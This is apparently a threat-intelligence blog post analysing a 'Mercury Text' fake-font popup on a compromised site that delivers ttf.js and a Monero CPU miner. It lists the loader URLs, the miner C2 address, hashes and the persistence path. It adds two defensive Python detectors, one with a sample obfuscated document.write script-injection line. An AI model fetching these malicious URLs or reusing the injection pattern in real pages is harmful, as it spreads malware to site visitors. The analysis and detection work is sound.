2017-11-12 - "MERCURY TEXT" POPUP ON CHROME & FIREFOX PUSHES COINMINER
ASSOCIATED FILES:
- Zip archive of the traffic: 2017-11-12-Mercury-Text-pop-sends-coinminer.pcap.zip 2.6 MB (2,610,547 bytes)
- 2017-11-12-Mercury-Text-pop-sends-coinminer.pcap (2,835,555 bytes)
- Zip archive of some artifacts: 2017-11-12-Mercury-Text-pop-sends-coinminer-artifacts.zip 4.5 MB (4,486,247 bytes)
- ttf.js (11,150 bytes)
- winhost.exe (2,586,112 bytes)
NOTES:
- Special thanks to @killamjr for notifying me about this.
IMAGES
Shown above: Mercury Text popup on a page from the compromised site when using Firefox.
Shown above: When using Firefox, this popup sends the JavaScript (.js) file directly.
Shown above: Mercury Text popup on a page from the compromised site when using Chrome.
Shown above: When using Chrome, this popup sends the JavaScript (.js) file inside a zip archive.
Shown above: The script displaying the Mercury Text popup isn't native to the site, but is called from bmooc.net.
Shown above: The bmooc.net URL was generated through a document.write, and this is the only JavaScript I found with a document.write.
Shown above: Traffic from an infection filtered in Wireshark.
Shown above: Post-infection traffic indicates this malware is the Monero (XMR) CPU miner.
Shown above: What ttf.js looks like when extracted from the zip archive.
Shown above: Monero CPU miner downloaded and run by the extracted .js file.
Shown above: Scheduled task making the Monero CPU miner persistent on the infected host.
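The images above show that the bmooc.net script was pulled in by a document.write call that did not belong to the compromised site. The following is an added example (not code from the original post or from the compromised site) of how to triage a saved page body for that pattern: it finds every document.write() call, rejoins split string literals like '<scr'+'ipt' so obfuscated tags read as whole, and reports any injected script whose src points at a host other than the site itself. The HTML snippet inside the block is constructed for the example; the site and bmooc.net hostnames and the cat.php?m=f URL are the ones listed in this post.

```python
import re
from urllib.parse import urlparse

# Constructed sample page body (not from the pcap): an inline script whose
# document.write() injects an off-site script tag, plus a benign same-site one.
SAMPLE_HTML = """
<html><head>
<script src="/js/jquery.min.js"></script>
<script>
document.write('<scr'+'ipt src="http://bmooc.net/wp-content/service/cat.php?m=f"></scr'+'ipt>');
</script>
<script>document.write("<script src='/assets/app.js'></" + "script>");</script>
</head><body></body></html>
"""

# Argument list of each document.write(...) call, up to the closing ");".
DOC_WRITE = re.compile(r"document\.write\s*\((.*?)\)\s*;", re.S)
# Single- or double-quoted string literals inside that argument list.
STR_LIT = re.compile(r"""(['"])(.*?)\1""", re.S)
# src= attribute values (quoted or bare) in the reassembled markup.
SRC_ATTR = re.compile(r"""src\s*=\s*['"]?([^'"\s>]+)""", re.I)


def unsplit_literal(arg):
    """Rejoin 'a'+'b' string concatenation so split tags like '<scr'+'ipt' become whole."""
    return "".join(m.group(2) for m in STR_LIT.finditer(arg))


def find_injected_scripts(html, site_host):
    """Return (written_markup, src_host) for each document.write() that
    injects a <script> whose src is served from a host other than site_host."""
    hits = []
    for m in DOC_WRITE.finditer(html):
        markup = unsplit_literal(m.group(1))
        if "<script" not in markup.lower():
            continue
        for src in SRC_ATTR.findall(markup):
            host = urlparse(src).hostname
            if host and host != site_host:
                hits.append((markup, host))
    return hits


if __name__ == "__main__":
    for markup, host in find_injected_scripts(SAMPLE_HTML, "www.lcmarkets.com.au"):
        print("off-site script injected via document.write from %s: %s" % (host, markup))
```

Relative src values (no hostname) are treated as same-site and skipped, so a legitimate `/assets/app.js` written by the page's own code does not fire; a real-world version would also need to resolve protocol-relative `//host/...` URLs and follow writes built from variables rather than literals.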
TRAFFIC
ASSOCIATED DOMAINS:
- www.lcmarkets.com.au - GET / [compromised site]
- 162.254.150.34 port 80 bmooc.net - GET /wp-content/service/cat.php?m=f [returned JavaScript for Mercury Text popup]
- 162.254.150.34 port 80 bmooc.net - GET /wp-content/service/cat.php?m=j [returned ttf.js]
- 162.254.150.34 port 80 bmooc.net - GET /wp-content/service/cat.php?m=e [returned Monero CPU miner malware]
- 185.202.103.26 port 5000 - post-infection TCP traffic for Monero CPU miner
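The three cat.php requests above differ only in the m= parameter, and each value maps to one stage of the chain (popup script, ttf.js, miner), followed by the miner's TCP check-in to 185.202.103.26:5000. The following is an added example (not code from the original post) that turns those indicators into detection logic over a flow log: for each client it records which loader stages were requested and whether the miner C2 port was contacted afterwards, then gives a verdict. The log format (ts,src_ip,dst_ip,dst_port,host,uri) and the sample lines are constructed for the example; the hosts, paths, IPs and port are the ones listed in this post.

```python
from urllib.parse import urlparse, parse_qs

# Indicators taken from the traffic section of this post.
LOADER_HOST = "bmooc.net"
LOADER_PATH = "/wp-content/service/cat.php"
STAGES = {"f": "popup script", "j": "ttf.js dropper", "e": "Monero miner (winhost.exe)"}
MINER_C2 = ("185.202.103.26", 5000)

# Constructed log lines (not from the pcap). Format: ts,src_ip,dst_ip,dst_port,host,uri
# Non-HTTP flows carry "-" for host and uri.
SAMPLE_LOG = """\
1510500001,10.0.0.5,203.0.113.9,80,www.lcmarkets.com.au,/
1510500002,10.0.0.5,162.254.150.34,80,bmooc.net,/wp-content/service/cat.php?m=f
1510500030,10.0.0.5,162.254.150.34,80,bmooc.net,/wp-content/service/cat.php?m=j
1510500045,10.0.0.5,162.254.150.34,80,bmooc.net,/wp-content/service/cat.php?m=e
1510500060,10.0.0.5,185.202.103.26,5000,-,-
1510500070,10.0.0.7,162.254.150.34,80,bmooc.net,/wp-content/service/cat.php?m=f
1510500080,10.0.0.9,185.202.103.26,5000,-,-
"""


def parse_line(line):
    ts, src, dst, port, host, uri = line.split(",", 5)
    return {"ts": int(ts), "src": src, "dst": dst, "port": int(port), "host": host, "uri": uri}


def loader_stage(rec):
    """Return the m= value if this request hits the bmooc.net loader with a known stage, else None."""
    if rec["host"] != LOADER_HOST:
        return None
    parsed = urlparse(rec["uri"])
    if parsed.path != LOADER_PATH:
        return None
    m = parse_qs(parsed.query).get("m", [None])[0]
    return m if m in STAGES else None


def analyze(log_text):
    """Per client IP: loader stages seen (in order) and whether miner C2 was contacted."""
    findings = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        state = findings.setdefault(rec["src"], {"stages": [], "miner_c2": False})
        stage = loader_stage(rec)
        if stage and stage not in state["stages"]:
            state["stages"].append(stage)
        elif (rec["dst"], rec["port"]) == MINER_C2:
            state["miner_c2"] = True
    return findings


def verdict(state):
    """Summarise one client's state; C2 contact without the m=e download still needs a look."""
    if state["miner_c2"] and "e" in state["stages"]:
        return "infected: miner downloaded and checked in to C2"
    if state["miner_c2"]:
        return "miner C2 contact without observed download (investigate host)"
    if "e" in state["stages"]:
        return "miner downloaded, no C2 seen yet"
    if state["stages"]:
        return "popup/loader stage only (%s)" % ", ".join(STAGES[s] for s in state["stages"])
    return "clean"


if __name__ == "__main__":
    for ip, state in sorted(analyze(SAMPLE_LOG).items()):
        print("%-10s stages=%-15s %s" % (ip, "".join(state["stages"]) or "-", verdict(state)))
```

Keying on the cat.php path plus the m= value rather than on the full URL keeps the rule from breaking if the operator reorders or adds query parameters, while the separate C2 check catches hosts that were infected before logging started (10.0.0.9 in the sample), which a pure chain match would miss.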
MALWARE
DOWNLOADED .JS FILE (USING FIREFOX BROWSER):
- SHA256 hash: 33fced63e4209e813861c5abd18236bec68a864362bb3433791bcb38238c3bfc
- File size: 11,150 bytes
- File name: ttf.js
MONERO (XMR) CPU MINER:
- SHA256 hash: a49ab3e7aa54532a2086ad35a08b253fc330a38803698c33c48912f7438c49a5
- File size: 2,586,112 bytes
- File location: C:\Users\[username]\AppData\Roaming\winhost.exe
FINAL NOTES
Once again, here are the associated files:
- Zip archive of the traffic: 2017-11-12-Mercury-Text-pop-sends-coinminer.pcap.zip 2.6 MB (2,610,547 bytes)
- Zip archive of some artifacts: 2017-11-12-Mercury-Text-pop-sends-coinminer-artifacts.zip 4.5 MB (4,486,247 bytes)
Zip and saz files are password-protected with the standard password. If you don't know it, look at the "about" page of this website.